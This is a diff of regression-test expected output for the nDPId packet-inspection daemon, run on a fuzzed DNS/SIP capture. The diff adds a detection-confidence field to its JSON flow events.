 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1120469831652,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469831652,"pkt":"ADBUADRWAODtAXq9CABFAABISiEAAIARTTDAqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469831652,"flow_last_seen":1120469831652,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469831652,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2732,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":138,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120469833655,"pkt":"MDBUADRWAODtAW69CABFAABIaiIAE4ARTS\/AqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":138,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1120469835658,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469835658,"pkt":"ADBUADRWAODtAW69CABFAABIaiMAAIARTS7AqAECwKgBAQqsADUANM1AXNgBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
@@ -251,256 +251,256 @@
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1120469839664,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469839664,"pkt":"ADBUADRWAODtAW69CABFAABIaiQAAIARTS3AqAECwKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469847666,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1120469847666,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120469847666,"pkt":"9jBUADRWAODtAW69CABFAABEaiUAAIARTTDAqAECwKhzAQqtADUAMFw5yNgAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycWEAAAwAAQ=="}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469847666,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arqa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847666,"flow_last_seen":1120469847666,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120469847666,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.115.1","src_port":2733,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arqa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1120469847667,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120469847667,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cq0ARz61yNiAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwmEb2NhbGhvc3QA"}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847667,"flow_last_seen":1120469847667,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469847667,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2733,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00972{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":143,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":509,"pkt_l4_len":0,"ts_msec":1120469847669,"pkt":"ADBUADRWAODtAVK9CABFAAHvaiZJAIB4FxjAqAEC1PIhIxPEE8QB25tyUkVmSVNURVIgc2lZOnNpcC5jeWJlckdpdHkyZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTZxJXMAMjticmFuY2g9ejloRzRiS25wMTIzNzU5MDYzLTQ2NGJjMWJiMTkyLjE2OC4xLjI7cpdvcnQNaUZyb206IDxzaXA6dm9pMTgwNjJAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTc2MDY5ZTQNClRvOiA8c2lwOnZvaTE4MDYyQHNpcC5jeWJlcmNpdHkuZGs+QwpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00200{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":143,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":475}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1120469847979,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469847979,"pkt":"ADBUADRWAODtAW69CABFAABIaicAAIARTSrAqAECwKgBAQquADUANKw8fdoBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469847979,"flow_last_seen":1120469847979,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469847979,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1120469848977,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469848977,"pkt":"ADBUADRWAODtAW69CABFAABIaigAAIARTSmsqAECwKgBAQquADUANKw8fdoBAAABAAAA4wAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469850980,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1120469850980,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469850980,"pkt":"ADBUADRWAODtAW69CABFAABIaikAAFIRTSjAqAECwKgBAQquADUANKw8fdoBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJYaXR5AmRrAAAhAAE="}
-00765{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469847979,"flow_last_seen":1120469850980,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469850980,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberxity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00791{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469847979,"flow_last_seen":1120469850980,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469850980,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberxity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1120469852983,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120469852983,"pkt":"ADBUADRWAODtAW69CABFAABIaioAAIARTSfAqAECwKgBAQquADUANKw8Q9oBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469847979,"flow_last_seen":1120469852983,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469852983,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469847979,"flow_last_seen":1120469852983,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469852983,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680447,"flow_last_seen":1120469680447,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":9587,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680447,"flow_last_seen":1120469680447,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":9587,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685452,"flow_last_seen":1120469685452,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.17.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469681446,"flow_last_seen":1120469689458,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
